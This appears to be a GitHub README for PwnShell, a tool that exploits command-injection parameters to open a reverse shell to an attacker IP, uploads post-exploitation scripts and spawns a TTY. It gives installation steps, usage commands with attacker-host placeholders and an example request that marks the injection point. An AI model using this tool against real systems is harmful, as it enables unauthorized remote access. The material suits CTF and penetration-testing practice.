PwnShell
PwnShell copied to clipboard
Command Execution exploiter with an auto connection handling
PwnShell
PwnShell is a tool that will help you get a reverse shell and upload post-exploitation scripts to target machine instead of wasting your time with this regular ctf stuff... just confirm the injection point and feed it to this dumb tool.
- Bruteforces the Vulnerable Parameter
- Recieve and Handle the Connection
- Downloads Post exploitation scripts from their Repos.
- Uploads them to target
- Activates a TTY shell using Python3
- Enjoy!
Navigation:
- Installation
- Usage
- Contact
- Acknowledgements
Installation:
- Clone the repo
git clone https://github.com/zAbuQasem/PwnShell
- Install the dependencies
cd PwnShell/ pip3 install -r requirements.txt
- Make the script executable
chmod +x pwnshell.py
Usage:
Request-File Method [Recommended] 👇
./pwnshell.py -i [Attacker-IP] -f [REQUEST FILE] -s (To use https prefix)
Example:
-
Copy from Burp or Network tab
-
Replace the Vulnerable place in the parameter with 'PWNME'
GET /Vulnerable.php?cmd=PWNME HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
URL Method 👇
./pwnshell.py -i [Attacker-IP] -p [Attacker-Port] -u [TARGET-URL] -m [REQUEST-METHOD] -c [COOKIES (optional)] -H [HEADERS (optional)]
#Note: Cookie and headers must be in JSON format (if provided).
./pwnshell.py -i [Attacker-IP] -u http/s://<TARGET>/vulnerable.php?cmd=PWNME --method GET --cookies '{"key" : "value"}'
Example:
-Replace the Vulnerable place in the parameter with 'PWNME'
./pwnshell.py -H 127.0.0.1 -u http://10.10.10.10/vulnerable.php?cmd=PWNME
Preview:
Using [Request-File Method]
Using [URL Method]
Contact:
Zeyad AbuQasem - LinkedIn
Omar Albalouli - LinkedIn & Github